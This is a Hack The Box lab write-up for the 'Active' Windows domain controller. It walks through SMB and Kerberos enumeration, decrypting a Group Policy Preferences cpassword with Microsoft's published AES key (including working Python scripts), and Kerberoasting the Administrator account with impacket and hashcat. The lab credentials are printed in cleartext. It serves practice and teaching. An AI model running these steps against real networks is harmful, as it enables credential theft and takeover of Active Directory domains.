Writeup: Hack The Box - Machines - Active

Description

  • Name: Active
  • IP: 10.10.10.100
  • Author: eks,mrb3n
  • Difficulty: 4.3/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.100

PORT      STATE SERVICE       VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-08-08 07:32:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-08-08 09:33:36
|_ start_date: 2018-08-08 06:06:17

Pwn

Using nullinux we can try to enumerate domains, shares and users from SMB.

P.S. nullinux requires smbclient to be installed, and the client min protocol has to be forced to SMB2 in /etc/samba/smb.conf.

python3 nullinux.py -a 10.10.10.100

[*] Enumerating Shares for: 10.10.10.100
Shares Comments
-------------------------------------------
\\10.10.10.100\ADMIN$ Remote Admin
\\10.10.10.100\C$ Default share
\\10.10.10.100\IPC$
\\10.10.10.100\NETLOGON Logon server share
\\10.10.10.100\Replication
\\10.10.10.100\SYSVOL Logon server share
\\10.10.10.100\Users

[*] Enumerating: \\10.10.10.100\Replication
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018

[*] Enumerating Domain Information for: 10.10.10.100
[-] Could not attain Domain SID

[*] Enumerating querydispinfo for: 10.10.10.100

[*] Enumerating enumdomusers for: 10.10.10.100

[*] Enumerating LSA for: 10.10.10.100

[*] Performing RID Cycling for: 10.10.10.100
[-] RID Failed: Could not attain Domain SID

[*] Testing 10.10.10.100 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.100

[-] No valid users or groups detected

Since we know the domain (ACTIVE, duh!) we can try to enumerate usernames through the Kerberos service with the nmap NSE script krb5-enum-users.

88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| administrator@ACTIVE
|_ dc@ACTIVE

As an alternative to nmap we can use the Metasploit module auxiliary/gather/kerberos_enumusers.

[+] 10.10.10.100:88 - User: "administrator" is present
[+] 10.10.10.100:88 - User: "dc" is present
[-] 10.10.10.100:88 - User: "guest" account disabled or locked out

First of all we downloaded the Replication share, which does not require authentication:
smbclient //10.10.10.100/Replication -U ""%"" -c 'prompt OFF;recurse ON;mget *'

The active.htb folder contains a lot of files and folders, but searching for "pass" with ripgrep turns up a GPP password in Groups.xml.

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>

The cpassword attribute stores the password, encrypted with AES-256, for the Group Policy Preferences (GPP) item created and saved in this XML file.

Microsoft published the (symmetric) AES key in its documentation, so anyone holding the XML can decrypt the password.

More info: https://adsecurity.org/?p=2288.

Now that we have the encrypted password and the key we can decrypt it:

from Crypto.Cipher import AES
from base64 import b64decode

# AES-256 key published by Microsoft for GPP cpassword values
key = """
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ", "").replace("\n", "").strip()

key = bytes.fromhex(key)

# cpassword from Groups.xml; GPP strips the base64 padding, so it is added back here
cpassword = b64decode("edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==")

# AES-CBC with an all-zero IV (the IV must be bytes, not str)
o = AES.new(key, AES.MODE_CBC, b"\x00" * 16).decrypt(cpassword)

# The plaintext is UTF-16LE with PKCS#7 padding: strip the padding before decoding
o = o[:-o[-1]]
print(o.decode("utf-16-le"))

We got the GPP password: GPPstillStandingStrong2k18.

The XML should exist only in the SYSVOL share, but the sysadmin created the Replication share as a backup with anonymous access, compromising the security of the entire system.

Now that we have a username and password we can rerun nullinux to gather more information.

[*] Enumerating Shares for: 10.10.10.100
Shares Comments
-------------------------------------------
\\10.10.10.100\ADMIN$ Remote Admin
\\10.10.10.100\C$ Default share
\\10.10.10.100\IPC$
\\10.10.10.100\NETLOGON Logon server share
\\10.10.10.100\Replication
\\10.10.10.100\SYSVOL Logon server share
\\10.10.10.100\Users

[*] Enumerating: \\10.10.10.100\NETLOGON
. D 0 Wed Aug 8 12:02:39 2018
.. D 0 Wed Aug 8 12:02:39 2018

[*] Enumerating: \\10.10.10.100\Replication
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018

[*] Enumerating: \\10.10.10.100\SYSVOL
. D 0 Wed Aug 8 12:02:40 2018
.. D 0 Wed Aug 8 12:02:40 2018
active.htb D 0 Wed Jul 18 20:48:57 2018
GHDLXVKonw D 0 Wed Aug 8 12:02:34 2018
vHDsdRgOTM D 0 Wed Aug 8 12:02:40 2018
WlCneTZBAq D 0 Wed Aug 8 12:01:57 2018

[*] Enumerating: \\10.10.10.100\Users
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHS 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHS 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018

[*] Enumerating Domain Information for: 10.10.10.100
[+] Domain Name: ACTIVE
[+] Domain SID: S-1-5-21-405608879-3187717380-1996298813

[*] Enumerating querydispinfo for: 10.10.10.100
Administrator
Guest
krbtgt
SVC_TGS

[*] Enumerating enumdomusers for: 10.10.10.100
Administrator
Guest
krbtgt
SVC_TGS

[*] Enumerating LSA for: 10.10.10.100

[*] Performing RID Cycling for: 10.10.10.100
500
501
502
503
504
Administrator
505
krbtgt
506
507
Guest
508
509
510
511
512
513
514
515
Domain Admins (Network/LocalGroup)
516
517
Domain Users (Network/LocalGroup)
518
Domain Guests (Network/LocalGroup)
519
Schema Admins (Network/LocalGroup)
Domain Computers (Network/LocalGroup)
520
Domain Controllers (Network/LocalGroup)
521
522
Cert Publishers (Network/LocalGroup)
523
Enterprise Admins (Network/LocalGroup)
524
525
Read-only Domain Controllers (Network/LocalGroup)
Group Policy Creator Owners (Network/LocalGroup)
526
527
528
529
530

[*] Testing 10.10.10.100 for Known Users
Administrator
Guest
krbtgt

[*] Enumerating Group Memberships for: 10.10.10.100
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
Administrator
[+] Group: Domain Users
Administrator
krbtgt
SVC_TGS
[+] Group: Domain Guests
Guest
[+] Group: Domain Computers
[+] Group: Domain Controllers
DC$
[+] Group: Schema Admins
Administrator
[+] Group: Enterprise Admins
Administrator
[+] Group: Group Policy Creator Owners
Administrator
[+] Group: Read-only Domain Controllers
[+] Group: DnsUpdateProxy

[+] 5 USER(s) identified in 11 GROUP(s)
[*] Writing users to file: ./nullinux_users.txt

First of all we can see that we now have access to the Users share, where the first flag should be.

Connecting as user SVC_TGS to the share //10.10.10.100/Users we can find the user.txt file in \SVC_TGS\Desktop\.

Now that we have access to some shares we can check whether we can find other credentials or interesting files.

CrackMapExec ships tons of modules and scripts to retrieve information from SMB services (and others).

For example, we can use the gpp_password module to search the shares for other credentials.

cme smb 10.10.10.100 -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -M gpp_password

SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:ACTIVE) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] ACTIVE\SVC_TGS:GPPstillStandingStrong2k18
GPP_PASS... 10.10.10.100 445 DC [+] Found SYSVOL share
GPP_PASS... 10.10.10.100 445 DC [*] Searching for potential XML files containing passwords
GPP_PASS... 10.10.10.100 445 DC [*] Found active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.10.100 445 DC [+] Found credentials in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.10.100 445 DC Password: GPPstillStandingStrong2k18
GPP_PASS... 10.10.10.100 445 DC userName: active.htb\SVC_TGS
GPP_PASS... 10.10.10.100 445 DC noChange: 1
GPP_PASS... 10.10.10.100 445 DC neverExpires: 1
GPP_PASS... 10.10.10.100 445 DC description:
GPP_PASS... 10.10.10.100 445 DC acctDisabled: 0
GPP_PASS... 10.10.10.100 445 DC newName:
GPP_PASS... 10.10.10.100 445 DC changeLogon: 0
GPP_PASS... 10.10.10.100 445 DC action: U
GPP_PASS... 10.10.10.100 445 DC fullName:
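The gpp_password module above and the decryption script earlier do the same job. As an added example (not the writeup's code, nor CrackMapExec's), the scanner below walks a local copy of SYSVOL, pulls every cpassword attribute out of the Preferences XML files (Groups.xml, Services.xml, ScheduledTasks.xml and so on) and decrypts them with the published key, the way an admin would audit their own SYSVOL. It assumes pycryptodome or the cryptography package is installed; the sample Groups.xml is the one from this writeup, trimmed to the relevant attributes.

```python
import base64
import pathlib
import tempfile
import xml.etree.ElementTree as ET

GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")  # AES-256 key Microsoft published (MS-GPPREF)

SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User name="active.htb\SVC_TGS" changed="2018-07-18 20:46:06">
<Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" userName="active.htb\SVC_TGS"/>
</User></Groups>"""  # constructed sample: the writeup's Groups.xml, trimmed

def _aes_cbc_decrypt(key, iv, data):
    try:  # pycryptodome, as in the writeup's script
        from Crypto.Cipher import AES
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
    except ImportError:  # fall back to the `cryptography` package
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()

def decrypt_cpassword(cpassword):
    """Restore base64 padding, AES-256-CBC with an all-zero IV, strip PKCS#7, decode UTF-16LE."""
    cpassword += "=" * (-len(cpassword) % 4)  # GPP stores the base64 without '=' padding
    ct = base64.b64decode(cpassword)
    if not ct or len(ct) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    pt = _aes_cbc_decrypt(GPP_KEY, b"\x00" * 16, ct)
    pad = pt[-1]
    if not 1 <= pad <= 16 or pt[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: corrupted cpassword")
    return pt[:-pad].decode("utf-16-le")

def find_gpp_passwords(root):
    """Walk a SYSVOL copy; return (file, account, cleartext) for every cpassword attribute found."""
    findings = []
    for path in pathlib.Path(root).rglob("*.xml"):
        for elem in ET.parse(path).iter():
            cp = elem.get("cpassword")
            if cp:
                account = elem.get("userName") or elem.get("accountName") or elem.get("runAs") or "?"  # Groups.xml / Services.xml / ScheduledTasks.xml
                findings.append((str(path), account, decrypt_cpassword(cp)))
    return findings

def demo():
    # Drop the sample into a temporary SYSVOL-like tree (GPO GUID from the writeup) and scan it
    with tempfile.TemporaryDirectory() as tmp:
        gpo = pathlib.Path(tmp, "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups")
        gpo.mkdir(parents=True)
        (gpo / "Groups.xml").write_text(SAMPLE_GROUPS_XML, encoding="utf-8")
        return find_gpp_passwords(tmp)
```

Running demo() yields one finding: the Groups.xml path, active.htb\SVC_TGS and the same cleartext cme reported.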

Since the username SVC_TGS recalls the Kerberos TGS, we used impacket's GetUserSPNs.py script to ask Kerberos (port 88) for a service ticket for the SPN registered to the Administrator user; the encrypted part of that ticket can then be cracked offline.

GetUserSPNs.py ACTIVE.HTB/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

With this hash we can start cracking with hashcat (-m 13100, Kerberos 5 TGS-REP etype 23).

The password for Administrator is Ticketmaster1968; we can validate those credentials with cme smb 10.10.10.100 -u "Administrator" -p "Ticketmaster1968" --shares and see what permissions Administrator has over those shares.

Now we can access the C$ share and read the root flag.